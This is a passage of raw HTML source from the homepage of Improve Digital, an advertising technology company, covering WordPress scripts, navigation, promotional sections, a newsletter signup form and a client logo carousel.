Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style type="text/css">img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-.1em!important;background:none!important;padding:0!important}</style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.improvedigital.com/main/wp-includes/css/dist/block-library/style.min.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='cookie-notice-front-css' href='https://www.improvedigital.com/main/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='ctf_styles-css' href='https://www.improvedigital.com/main/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.css?ver=1.2.10' type='text/css' media='all'/> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://www.improvedigital.com/main/wp-content/plugins/instagram-feed/css/sb-instagram.min.css?ver=1.10.1' type='text/css' media='all'/> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all'/> <link rel='stylesheet' id='responsive-lightbox-prettyphoto-css' href='https://www.improvedigital.com/main/wp-content/plugins/responsive-lightbox/assets/prettyphoto/css/prettyPhoto.min.css?ver=2.1.0' type='text/css' media='all'/> <link rel='stylesheet' id='wpml-legacy-dropdown-0-css' href='https://www.improvedigital.com/main/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-dropdown/style.css?ver=1' type='text/css' media='all'/> <style id='wpml-legacy-dropdown-0-inline-css' type='text/css'>.wpml-ls-statics-shortcode_actions,.wpml-ls-statics-shortcode_actions .wpml-ls-sub-menu,.wpml-ls-statics-shortcode_actions a{border-color:#cdcdcd}.wpml-ls-statics-shortcode_actions a{color:#444;background-color:#fff}.wpml-ls-statics-shortcode_actions a:hover,.wpml-ls-statics-shortcode_actions a:focus{color:#000;background-color:#eee}.wpml-ls-statics-shortcode_actions .wpml-ls-current-language>a{color:#444;background-color:#fff}.wpml-ls-statics-shortcode_actions .wpml-ls-current-language:hover>a,.wpml-ls-statics-shortcode_actions .wpml-ls-current-language>a:focus{color:#000;background-color:#eee}</style> <link rel='stylesheet' id='google-maps-builder-plugin-styles-css' href='https://www.improvedigital.com/main/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/assets/css/google-maps-builder.min.css?ver=2.1.2' type='text/css' media='all'/> <link rel='stylesheet' id='google-maps-builder-map-icons-css' href='https://www.improvedigital.com/main/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/includes/libraries/map-icons/css/map-icons.css?ver=2.1.2' type='text/css' media='all'/> <link rel='stylesheet' id='bootstrap-css' href='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/css/bootstrap.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='videojs-css' href='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/css/A.video-js.min.css,qver=5.0.4.pagespeed.cf.mpH4EC1hWJ.css' type='text/css' media='all'/> <link rel='stylesheet' id='main-css' href='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/A.style.css,qver=1558010365.pagespeed.cf.m4rAtNsSxT.css' type='text/css' media='all'/> <script>if(document.location.protocol!="https:"){document.location=document.URL.replace(/^http:/i,"https:");}</script> <script type='text/javascript'>//<![CDATA[ var monsterinsights_frontend={"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/www.improvedigital.com","hash_tracking":"false"}; //]]></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.4.2'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script src="https://www.improvedigital.com/main/wp-includes,_js,_jquery,_jquery-migrate.min.js,qver==1.4.1+wp-content,_plugins,_responsive-lightbox,_assets,_prettyphoto,_js,_jquery.prettyPhoto.min.js,qver==2.1.0+wp-content,_plugins,_responsive-lightbox,_assets,_infinitescroll,_infinite-scroll.pkgd.min.js,qver==5.0.4.pagespeed.jc.mU-uFitENt.js"></script><script>eval(mod_pagespeed_N7ChRy63gs);</script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=5.0.4'></script> <script>eval(mod_pagespeed_TfvO_ZKd3l);</script> <script>eval(mod_pagespeed_LYWf20DbNf);</script> <script type='text/javascript'>//<![CDATA[ var rlArgs={"script":"prettyphoto","selector":"lightbox","customEvents":"","activeGalleries":"0","animationSpeed":"normal","slideshow":"0","slideshowDelay":"5000","slideshowAutoplay":"0","opacity":"0.75","showTitle":"0","allowResize":"1","allowExpand":"1","width":"1080","height":"720","separator":"\/","theme":"pp_default","horizontalPadding":"20","hideFlash":"0","wmode":"opaque","videoAutoplay":"0","modal":"0","deeplinking":"0","overlayGallery":"1","keyboardShortcuts":"1","social":"0","woocommerce_gallery":"0","ajaxurl":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php","nonce":"b6e3f1d8b5"}; //]]></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.1.0'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-dropdown/script.js?ver=1'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/modernizr.js?ver=5.0.4'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/bootstrap/dropdown.js?ver=5.0.4'></script> <script src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/bootstrap,_transition.js,qver==5.0.4+lazyload.js,qver==5.0.4.pagespeed.jc.-pqU7eD_MF.js"></script><script>eval(mod_pagespeed_tgD9WB9UoW);</script> <script>eval(mod_pagespeed_ii6hMNVF8W);</script> <script type='text/javascript'>//<![CDATA[ var aamLocal={"nonce":"0fcb400ecc","ajaxurl":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php"}; //]]></script> <script type='text/javascript' src='//www.improvedigital.com/main/wp-content/plugins/advanced-access-manager/media/js/aam-login.js?ver=5.0.4'></script> <script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?v=3.exp&#038;libraries=places&#038;key=AIzaSyBsdJBtFSgVpeTA2VQQvynBlqicTnXP06U&#038;ver=5.0.4'></script> <link rel='https://api.w.org/' href='https://www.improvedigital.com/wp-json/'/> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.improvedigital.com/main/xmlrpc.php?rsd"/> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.improvedigital.com/main/wp-includes/wlwmanifest.xml"/> <meta name="generator" content="WordPress 5.0.4"/> <meta name="generator" content="WPML ver:3.7.1 stt:1;"/> </head> <body class="home blog cookies-not-set handheld ios tablet ipad safari"> <header class="siteheader siteheader-mastheader"> <nav class="navbar navbar-idt" role="navigation"> <div id="prenav"> <div class="container"> <div class="row"> <div class="search_wrap col-md-5 col-sm-4 hidden-xs"> <div id="sb-search" class="sb-search"> <form role="search" method="get" class="search-form" action="https://www.improvedigital.com/"> <input class="sb-search-input" placeholder="Enter your search term..." type="search" value="" name="s" id="search"> <input class="sb-search-submit" type="submit" value="Search"> <span class="sb-icon-search"></span> </form> </div> </div><!-- end .search_wrap --> <div class="col-md-4 col-md-offset-2 col-md-offset-1 col-sm-7 col-xs-12 " id="social-header"> <ul id="social_links"> <li><a href="https://twitter.com/improvedigital" class="twitter" target="blank" rel="Noopener Noreferrer"></a></li> <li> <a href="https://www.linkedin.com/company/improve-digital" class="linkedin" target="blank" rel="Noopener Noreferrer"></a></li> <li><a href="https://www.facebook.com/pages/Improve-Digital/104794536277798" target="blank" class="facebook" rel="Noopener Noreferrer"></a></li> <li><a href="https://www.instagram.com/improvedigital/" target="blank" class="instagram" rel="Noopener Noreferrer"></a></li> <li> <a href="https://www.youtube.com/channel/UCjYORqfz7i1ae3OsCgpoj2A" target="blank" class="youtube" rel="Noopener Noreferrer"></a></li> </ul> <div id="login_360"> <a href="http://360yield.com/" target="blank"> Login 360</a> </div><!-- end #login_360 --> </div> </div><!-- end row --> </div><!-- /.container --> </div><!-- end #prenavigation --> <div id="headernav" class="container"> <div class="row"> <div class="hnav-box col-md-3 col-xs-12 col-sm-3"> <hgroup class=""> <h1 class="site-title"> <a href="https://www.improvedigital.com/" title="Improve Digital" class="main-url"></a> </h1> </hgroup> </div> <div class="col-md-9 col-xs-12 col-sm-9" id="site-nav-wrap"> <nav id="site-navigation" class="header-navigation" role="navigation"> <button data-target=".navbar-main" data-toggle="collapse" class="navbar-toggle collapsed" type="button"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <div class="collapse navbar-collapse navbar-main"><ul id="menu-header-menu" class="nav navbar-nav"><li id="menu-item-7043" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-7043 active"><a title="Home" href="http://www.improvedigital.com">Home</a></li> <li id="menu-item-12171" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-12171 dropdown"><a title="Solution" href="#" data-toggle="dropdown_id" class="dropdown-toggle" aria-haspopup="true">Solution <span class="caret"></span></a> <ul role="menu" class="sub-menu dropdown-menu"> <li id="menu-item-27950" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27950"><a title="360 Polaris" href="https://www.improvedigital.com/360polaris/">360 Polaris</a></li> <li id="menu-item-19165" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19165"><a title="Testimonials" target="_blank" rel="Noopener Noreferrer" href="https://improvedigital.tv/watch/8">Testimonials</a></li> <li id="menu-item-19159" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-19159"><a title="Success Stories" href="https://www.improvedigital.com/success-stories/">Success Stories</a></li> </ul> </li> <li id="menu-item-17840" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-17840 dropdown"><a title="Partners" href="#" data-toggle="dropdown_id" class="dropdown-toggle" aria-haspopup="true">Partners <span class="caret"></span></a> <ul role="menu" class="sub-menu dropdown-menu"> <li id="menu-item-17423" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17423"><a title="Our Partners" href="https://www.improvedigital.com/partner/">Our Partners</a></li> <li id="menu-item-17587" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17587"><a title="Creative Gallery" href="https://www.improvedigital.com/creative-gallery/">Creative Gallery</a></li> </ul> </li> <li id="menu-item-18797" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-18797 dropdown"><a title="Insights" href="#" data-toggle="dropdown_id" class="dropdown-toggle" aria-haspopup="true">Insights <span class="caret"></span></a> <ul role="menu" class="sub-menu dropdown-menu"> <li id="menu-item-7606" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7606"><a title="News" href="https://www.improvedigital.com/news/">News</a></li> <li id="menu-item-17708" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17708"><a title="Events" href="https://www.improvedigital.com/events/">Events</a></li> <li id="menu-item-13404" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13404"><a title="Market Map" href="https://www.improvedigital.com/market-map/">Market Map</a></li> <li id="menu-item-21816" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21816"><a title="Improve Digital TV" target="_blank" rel="Noopener Noreferrer" href="http://www.improvedigital.tv">Improve Digital TV</a></li> <li id="menu-item-10631" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10631"><a title="Blog" target="_blank" rel="Noopener Noreferrer" href="http://www.improvedigital.com/site/staff-blog">Blog</a></li> </ul> </li> <li id="menu-item-10629" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-10629 dropdown"><a title="About Us" href="#" data-toggle="dropdown_id" class="dropdown-toggle" aria-haspopup="true">About Us <span class="caret"></span></a> <ul role="menu" class="sub-menu dropdown-menu"> <li id="menu-item-7038" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7038"><a title="Company" href="https://www.improvedigital.com/about-us/">Company</a></li> <li id="menu-item-18773" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18773"><a title="Join Us" href="https://www.improvedigital.com/join-us/">Join Us</a></li> </ul> </li> <li id="menu-item-7042" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7042"><a title="Contact Us" href="https://www.improvedigital.com/contact/">Contact Us</a></li> </ul></div> </nav> </div> </div> </div> <!-- /.container --> </nav> </div> <a href="#" class="back-to-top"></a> </header> <!-- end new header (to remove) --> <div id="content-wrapper"> <div id="main" class="content"> <div id="headerVideo"> <video autoplay loop id="bgvid"> <source src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/videos/homepage/video_homepage6.mp4" type="video/mp4"> </video> <img src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/videos/homepage/homepage_mobile.jpg" id="mobileIMG"/> <div class="vidText"> <div class="textWrapper"> <h3 style="opacity: 0;">Your <strong>All-in-One</strong>Advertising Platform</h3> <div class="headerAnimate text1"> <h3>Your <strong>All-in-One</strong> Advertising Platform </h3> </div><!-- /.text1 --> <div class="headerAnimate text2"> <h3><strong>Classic SSP</strong></h3> </div><!-- /.text2 --> <div class="headerAnimate text3"> <h3><strong>Header Bidding</strong></h3> </div><!-- /.text3 --> <div class="headerAnimate text4"> <h3><strong>Server Side Enterprise Solution</strong></h3> </div><!-- /.text4 --> <div class="headerAnimate text5"> <h3><strong>Full Holistic Platform</strong></h3> </div><!-- /.text5 --> </div> <div class="videoLinks"> <a role="button" target="_blank" href="http://www.improvedigital.com/request-demo" class="download_button_white">REQUEST DEMO</a> <a role="button" target="_blank" href="http://www.improvedigital.com/360polaris" class="download_button_white">DISCOVER MORE</a> </div> <a class="continue" href="#website_content"></a> </div><!-- /.vidText --> <div class="taglinetext"> <h3><a href="https://www.improvedigital.com/for-transparency/" target="_blank">For<strong> Transparency.</strong> For <strong>Revenue.</strong> For <strong>Content Providers.</strong></a></h3> </div> </div><div id="primary"> <div class="section_header" id="website_content"> <h3>What's in it for you?</h3> </div> <div class="home-lnews home-boxes animate-section"> <div class="container_full_page"> <div class="row no_margin"> <div class="col-md-4 col-sm-4 col-xs-12 nopadding"> <div class="news-item"> <div class="news_item_img"><a target="_blanc" href="https://www.improvedigital.com/header-bidding/"><img class="img-responsive lazy" data-original="https://www.improvedigital.com/main/wp-content/uploads/2014/10/headerBidding8.jpg"/></a></div> </div> <div class="home_white_box"> <p class="news-title">A new way to revenue - Get a closer look to our Header Bidding solution!</p> <p class="button_div_middle_home"><a role="button" target="_blanc" href="https://www.improvedigital.com/header-bidding/" class="download_button_dblue">Read More </a></p> </div> </div> <div class="col-md-4 col-sm-4 col-xs-12 nopadding"> <div class="news-item"> <div class="news_item_img"><a target="_blanc" href="https://www.improvedigital.com/on-the-road-to-dmexco/"><img class="img-responsive lazy" data-original="https://www.improvedigital.com/main/wp-content/uploads/2018/08/dmexco_bg-1.png"/></a></div> </div> <div class="home_white_box"> <p class="news-title">We'd like to meet you at dmexco </p> <p class="button_div_middle_home"><a role="button" target="_blanc" href="https://www.improvedigital.com/on-the-road-to-dmexco/" class="download_button_dblue">Request a meeting</a></p> </div> </div> <div class="col-md-4 col-sm-4 col-xs-12 nopadding"> <div class="news-item"> <div class="news_item_img"><a target="_blank" href="https://www.improvedigital.com/for-transparency/"><img class="img-responsive lazy" data-original="https://www.improvedigital.com/main/wp-content/uploads/2018/08/Transparency_Grosse_image_780x566.jpg"/></a></div> </div> <div class="home_white_box"> <p class="news-title">Discover how we stand for Transparency and what it means for you</p> <p class="button_div_middle_home"><a role="button" target="_blanc" href="https://www.improvedigital.com/for-transparency/" class="download_button_dblue">Read More</a></p> </div> </div> </div><!-- end row --> </div><!-- end container --> </div><!-- end .home-lnews --> <div class="home-lnews home-boxes radar parallax animate-section"> <div class="container"> <!------------------------------------------------- ENGLISH MARKET MAP --------------------------> <div class="col-md-12 col-sm-12 col-xs-12" id="market_map" style="text-align: center"> <h2 class="box-title"><a href="https://www.improvedigital.com/market-map/">Market Map</a></h2> <p> Discover the 2018 video and display advertising ecosystem Market Map.</p> <div class="market_img"><a href="http://www.improvedigital.com/market-map"><img class="img_opacity" src="https://www.improvedigital.com/main/wp-content/uploads/2015/09/market_maps_icons.png" width="156px"/></a></div> <h3>EU Display & Video<br>Market Map </h3> <p class="button_div_middle"><a role="button" href="http://www.improvedigital.com/en/market-map" class="download_button_white">Read More</a></p> </div> <!------------------------------------------------- GERMAN MARKET MAP --------------------------> </div> </div><!-- end container --> </div><!-- end .home-lnews --> <!------------------------------------------------- ENGLISH NEWS AND VIEW ------------------------ --------------------------> <div class="section_header animate-section"> <h1>Programmatic Moves Fast</h1> </div> <div class="news_views animate-section"> <div class="container"> <div class="row"> <!---<div class="col-md-3 col-sm-3 col-xs-12" style="margin-bottom: 20px" > <a href="http://www.improvedigital.com/market-insights" ><img class="img_opacity" src="http://www.improvedigital.com/main/wp-content/uploads/2015/09/bulb_icon.png" width="70px"/></a> <h1>Market Insights</h1> <p>Discover the latest insights from the digital advertising market.</p> <p class="button_div_middle"><a role="button" href="http://www.improvedigital.com/market-insights" class="download_button_dblue" >Read More</a></p> </div>---> <div class=" col-md-4 col-sm-4 col-xs-12" style="margin-bottom: 20px; "> <a href="http://www.improvedigital.com/news"><img class="img_opacity" src="https://www.improvedigital.com/main/wp-content/uploads/2015/09/98xNxmegaphone_icon.png.pagespeed.ic.hjVF7m8J7z.png" width="98px"/></a> <h3>News</h3> <p>Keep up to date with Improve Digital’s<br> latest news from across Europe.</p> <p class="button_div_middle"><a role="button" href="http://www.improvedigital.com/news" class="download_button_dblue">See the latest news</a> </div> <div class="col-md-4 col-sm-4 col-xs-12" style="margin-bottom: 20px"> <a href="http://www.improvedigital.com/site/staff-blog"><img class="img_opacity" src="https://www.improvedigital.com/main/wp-content/uploads/2015/09/63xNxblog_icon.png.pagespeed.ic._Qie_EZ3KT.png" width="63px"/></a> <h3>Blog</h3> <p>Our blog analyses the trends <br>within digital advertising.</p> <p class="button_div_middle"><a role="button" href="http://www.improvedigital.com/site/staff-blog" class="download_button_dblue">Get the inside view</a> </div> <div class="col-md-4 col-sm-4 col-xs-12" style="margin-bottom: 20px"> <a class="mail_pop" href="#mailchimp_form" data-rel="lightbox"><img class="img_opacity" src="https://www.improvedigital.com/main/wp-content/uploads/2015/09/75xNxnew_envelop.png.pagespeed.ic.GL6Kx2CG2V.png" width="75px"/></a> <h3>Newsletter</h3> <p>Getting the latest programmatic <br>news has never been easier.</p> <p class="button_div_middle"><a class="download_button_dblue mail_pop" href="#mailchimp_form" data-rel="lightbox">Subscribe here</a> <div id="mailchimp_form"> <div class="mc_custom_border_hdr">Sign up for our NEWSLETTER</div> <div id="mc_signup"> <section id="yikes-mailchimp-container-3" class="yikes-mailchimp-container yikes-mailchimp-container-3 "> <form id="sign-up-for-newsletter-2018-3" class="yikes-easy-mc-form yikes-easy-mc-form-3 idSignup" method="POST" data-attr-form-id="3"> <label for="yikes-easy-mc-form-3-EMAIL" class="EMAIL-label yikes-mailchimp-field-required "> <!-- dictate label visibility --> <span class="EMAIL-label"> Email Address </span> <!-- Description Above --> <input id="yikes-easy-mc-form-3-EMAIL" name="EMAIL" placeholder="" class="yikes-easy-mc-email " required="required" type="email" value=""> <!-- Description Below --> </label> <label for="yikes-easy-mc-form-3-FNAME" class="FNAME-label "> <!-- dictate label visibility --> <span class="FNAME-label"> First Name </span> <!-- Description Above --> <input id="yikes-easy-mc-form-3-FNAME" name="FNAME" placeholder="" class="yikes-easy-mc-text " type="text" value=""> <!-- Description Below --> </label> <label for="yikes-easy-mc-form-3-LNAME" class="LNAME-label "> <!-- dictate label visibility --> <span class="LNAME-label"> Last Name </span> <!-- Description Above --> <input id="yikes-easy-mc-form-3-LNAME" name="LNAME" placeholder="" class="yikes-easy-mc-text " type="text" value=""> <!-- Description Below --> </label> <label class="yikes-mailchimp-eu-compliance-label"><input type="checkbox" required="required" name="eu-laws" value="1"> <div class="yikes-mailchimp-eu-compliance-text"><p>By checking this box I consent to the use of my information provided for email marketing purposes.</p> </div></label> <!-- Honeypot Trap --> <input type="hidden" name="yikes-mailchimp-honeypot" id="yikes-mailchimp-honeypot-3" value=""> <!-- List ID --> <input type="hidden" name="yikes-mailchimp-associated-list-id" id="yikes-mailchimp-associated-list-id-3" value="6fea640070"> <!-- The form that is being submitted! Used to display error/success messages above the correct form --> <input type="hidden" name="yikes-mailchimp-submitted-form" id="yikes-mailchimp-submitted-form-3" value="3"> <!-- Submit Button --> <button type="submit" class="yikes-easy-mc-submit-button yikes-easy-mc-submit-button-3 btn btn-primary "> <span class="yikes-mailchimp-submit-button-span-text">Subscribe</span></button> <!-- Nonce Security Check --> <input type="hidden" id="yikes_easy_mc_new_subscriber_3" name="yikes_easy_mc_new_subscriber" value="7d63aa3ca8"> <input type="hidden" name="_wp_http_referer" value="/"/> </form> <!-- MailChimp Form generated by Easy Forms for MailChimp v6.5.0 (https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/) --> </section> </div> </div> </div> <!------------------------------------------------- German NEWS AND VIEW ------------------------ --------------------------> </div> </div> </div> </div> <script type="text/javascript">if(document.querySelectorAll('#home-header video').length>0){jQuery(function($){var headerLoop="";videojs('header-loop').ready(function(){$('#header-loop').css('visibility','visible');headerLoop=this;headerLoop.play();headerLoop.dimensions('100%','auto');});var headerVideo=videojs('header-video');var isPaused=headerVideo.paused();var headerLoop2="";videojs('header-loop-2').ready(function(){$('#header-loop-2').css('visibility','visible');headerLoop2=this;headerLoop2.play();headerLoop2.volume(0);headerLoop2.dimensions('100%','auto');});var headerVideo2=videojs('header-video-2');var isPaused2=headerVideo2.paused();$('#header-loop .vjs-big-play-button').on('click',function(e){e.preventDefault();$('#header-loop, #home-header .carousel-indicators').hide();$('#hloop-text').css('z-index','-1');$('#hvideo-cont').show();var videoHeight=$('#header-video_html5_api').height();$("#home-header").carousel('pause').animate({'max-height':'658px'},{queue:false,duration:500});headerVideo.play();headerVideo.volume(0.5);isPaused=false;headerLoop.pause();});$('#header-loop-2 .vjs-big-play-button').on('click',function(e){e.preventDefault();$('#header-loop-2, #home-header .carousel-indicators').hide();$('#hloop-text-2').css('z-index','-1');$('#hvideo-cont-2').show();var videoHeight=$('#header-video-2_html5_api').height();$("#home-header").carousel('pause').animate({'max-height':'658px'},{queue:false,duration:500});headerVideo2.play();headerVideo2.volume(0.5);isPaused2=false;headerLoop2.pause();});headerVideo.on('ended',function(){$("#home-header").animate({'max-height':'550px'},{queue:false,duration:500});$('#header-loop, #home-header .carousel-indicators').show();$('#hloop-text, #hloop-text-2').css('z-index','2');headerLoop.play();$('#hvideo-cont').hide();});$('.hvideo-close').on('click',function(){$("#home-header").animate({'max-height':'550px'},{queue:false,duration:500});$('#header-loop,#header-loop-2, #home-header .carousel-indicators').show();$('#hloop-text, #hloop-text-2').css('z-index','2');headerLoop.play();headerVideo.pause();headerLoop2.play();headerVideo2.pause();$('#hvideo-cont, #hvideo-cont-2').hide();})});}</script> <script type="text/javascript">jQuery(function($){$(document).on('click','.continue',function(e){var contentTop=$('#primary').offset().top-120;$('html, body').animate({scrollTop:contentTop},500);e.preventDefault();return false;})});</script> </div><!-- end #main --> </div><!-- end #content-wrapper --> <div id="carousel_wrapper"> <div id="client_quotes" class="carousel slide container" data-ride="carousel"> <div class="carousel-inner row"> <div class="item active"> <div class="row"> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="https://www.marktplaats.nl/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xebay-285x200-1.png.pagespeed.ic.kiOQAB92Rf.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> </div> </div><!-- end .row --> </div> <div class="item "> <div class="row"> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.nettavisen.no/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xnettavisen-285x200.png.pagespeed.ic.cUqDFSZU4s.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="https://tradecast.tv/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xtradecast.png.pagespeed.ic.KMOh-WgvXi.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://admeira.ch/en/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xadmeira-1.png.pagespeed.ic.n28Uy3-qgk.png"/> </a> </div> </div><!-- end .row --> </div> <div class="item "> <div class="row"> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.tpvision.com/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/12/xtpvision-285x200.png.pagespeed.ic.mEoxTFkkur.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="https://tmgonlinemedia.nl/consent/consent/?return=https%3A%2F%2Fwww.tmg.nl%2F&clienttime=1494412035870&version=49&detect=true" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2017/02/xtmg_white.png.pagespeed.ic.FaGLDF5vVG.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="https://www.vixyvideo.com/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2015/05/xvixy-2.png.pagespeed.ic.e2tYIIezUj.png"/> </a> </div> </div><!-- end .row --> </div> <div class="item "> <div class="row"> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.rtl.nl/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2015/02/xrtl-285x200.png.pagespeed.ic.ncbnk6QRrd.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="https://www.bluebillywig.com/en" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xblue.png.pagespeed.ic.YQxShynPWw.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.hearst.com/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xhearst.png.pagespeed.ic.jxEZdvU5s4.png"/> </a> </div> </div><!-- end .row --> </div> <div class="item "> <div class="row"> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.vivaki.com/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xvivaky-285x200.png.pagespeed.ic.6b5y_1pz3Z.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.tvgids.nl/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2016/09/xtv_gids.png.pagespeed.ic.DBW5MH7lc9.png"/> </a> </div> <div class="col-sm-3 col-sm-offset-1 col-xs-12"> <a href="http://www.blick.ch/" target="_blank" rel="Noopener Noreferrer"> <img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/uploads/2014/01/xblick.png.pagespeed.ic.A7EmVA685c.png"/> </a> </div> </div><!-- end .row --> </div> </div><!-- end .carousel-inner --> <!-- Carousel nav --> <a class="carousel-control left" href="#client_quotes" data-slide="prev"> <span class="glyphicon glyphicon-chevron-left"></span> </a> <a class="carousel-control right" href="#client_quotes" data-slide="next"> <span class="glyphicon glyphicon-chevron-right"></span> </a> </div><!-- end #client_quotes --> </div> <!-- end .carousel_wrapper --> <div id="footer1_wrapp"> <div 